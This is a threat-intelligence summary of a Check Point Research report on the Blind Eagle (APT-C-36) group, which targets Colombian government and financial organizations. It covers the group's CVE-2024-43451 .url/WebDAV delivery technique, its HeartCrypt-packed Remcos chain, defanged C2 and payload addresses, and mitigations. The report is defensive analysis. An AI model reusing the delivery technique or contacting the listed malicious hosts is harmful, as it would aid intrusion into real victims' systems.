Full Report
Key Points Introduction APT-C-36, also known as Blind Eagle, is a threat group that engages in both espionage and cybercrime. It primarily targets organizations in Colombia and other Latin American countries. Active since 2018, this Advanced Persistent Threat (APT) group focuses on government institutions, financial organizations, and critical infrastructure. Blind Eagle is known for employing […] The post Blind Eagle: …And Justice for All appeared first on Check Point Research.
Analysis Summary
# Threat Actor: Blind Eagle (APT-C-36)
## Attribution & Identity
**Identification:** Advanced Persistent Threat (APT) group known as Blind Eagle, also tracked as APT-C-36.
**Origin:** Strongly suspected to originate from South America. Operating timezone identified as UTC-5, aligning with several South American countries.
**Nature:** Engages in both cyber espionage and cybercrime activities.
**Activity Span:** Active since 2018.
## Activity Summary
Blind Eagle is engaged in ongoing campaigns (since November 2024) primarily targeting Colombian institutions. The group rapidly incorporated a novel exploitation technique related to **CVE-2024-43451**, using malicious `.url` files just six days after Microsoft patched the vulnerability (November 12, 2024).
Recent campaigns have resulted in high infection rates, notably one around December 19, 2024, affecting over 1,600 victims, which is significant for the group's typically targeted APT approach. Earlier campaigns, such as "Operation fail" (March 2024), involved phishing impersonating Colombian banks, successfully collecting over 8,000 entries of Personally Identifiable Information (PII).
## Tactics, Techniques & Procedures
- **Initial Access/Delivery:** Distributing malicious payloads via phishing campaigns, often utilizing legitimate file-sharing platforms such as Google Drive, Dropbox, Bitbucket, and GitHub.
- **File Malice for Reconnaissance:** Utilizing malicious `.url` files that trigger WebDAV requests upon unusual interactions (right-clicking, deleting, dragging) to notify the attacker that the file was downloaded, even if the associated vulnerability (CVE-2024-43451) is patched.
- **Second Stage Execution:** Clicking the malicious `.url` file initiates a WebDAV request to download and execute the next-stage payload.
- **Evasion:** Leveraging the Packer-as-a-Service **HeartCrypt** to obfuscate malicious executables.
- **Malware Chaining:** Employing multiple commodity RATs in stages, culminating in Remcos RAT for final command and control.
**Note on CVE-2024-43451:** While Blind Eagle's variant triggers reconnaissance WebDAV requests like the zero-day exploit used by UAC-0194, the article suggests this specific variant does **not** expose the NTLMv2 hash on patched systems, but rather acts as a notification mechanism before downloading the second stage.
## Targeting
- **Sectors:** Judicial institutions, general government entities, financial organizations, and critical infrastructure.
- **Geography:** Primarily targets Colombia; broader focus on Latin American countries.
- **Victims:** Over 1,600 victims tracked in a single December 2024 campaign. Specific mention includes Colombian judicial institutions and other public/private organizations.
## Tools & Infrastructure
- **Malware Families:**
- .NET RAT variant (appears related to PureCrypter)
- NjRAT (historical/general arsenal)
- AsyncRAT (historical/general arsenal)
- **Remcos RAT** (Final payload)
- **Packers/Obfuscation:** **HeartCrypt** (Packer-as-a-Service)
- **Delivery Platforms:** Google Drive, Dropbox, Bitbucket, GitHub.
- **Infrastructure (C2/Download):**
- `62.60.226[.]64/file/` (Stage 2 download location)
- `republicadominica2025[.]ip-ddns[.]com` (Stage 2 C&C)
- `raw.githubusercontent[.]com/Oscarito20222/file/refs/heads/main/redtube.exe` (Stage 3 - ITW Endpoint delivery)
- `elyeso.ip-ddns[.]com:30204` (Remcos C&C)
## Implications
Blind Eagle poses a significant, persistent threat due to its agility (rapid integration of new exploitation vectors like the CVE-2024-43451 adjacent technique) and its dual focus on espionage and cybercrime. The high infection rates achieved through targeted campaigns against government entities highlight their effectiveness in gaining footholds within critical sectors in Latin America. Their use of commodity malware packaged with professional services (HeartCrypt) allows them to maintain high operational effectiveness while leveraging well-known tools.
## Mitigations
- **Endpoint Protection:** Implement advanced endpoint security solutions capable of detecting threats associated with the listed malware families (e.g., Remcos, PureCrypter variants) and behavioral anomalies related to file operations.
- **Vulnerability Management:** Ensure robust patching schedules, specifically targeting vulnerabilities like CVE-2024-43451, even when the initial attack vector seems neutralized, as adversaries adapt delivery methods.
- **Network Monitoring:** Monitor for unusual WebDAV requests initiated by file operations or by remote execution to detect signs of file download notifications or payload delivery.
- **Defense against Phishing:** Conduct continuous training for personnel regarding sophisticated social engineering used in phishing (such as impersonating local banks) and safe verification procedures for attachments and files from external sources, especially those hosted on file-sharing platforms.
- **Authentication Hardening:** Enforce protection against relay attacks, such as mandatory SMB signing, especially for high-value accounts.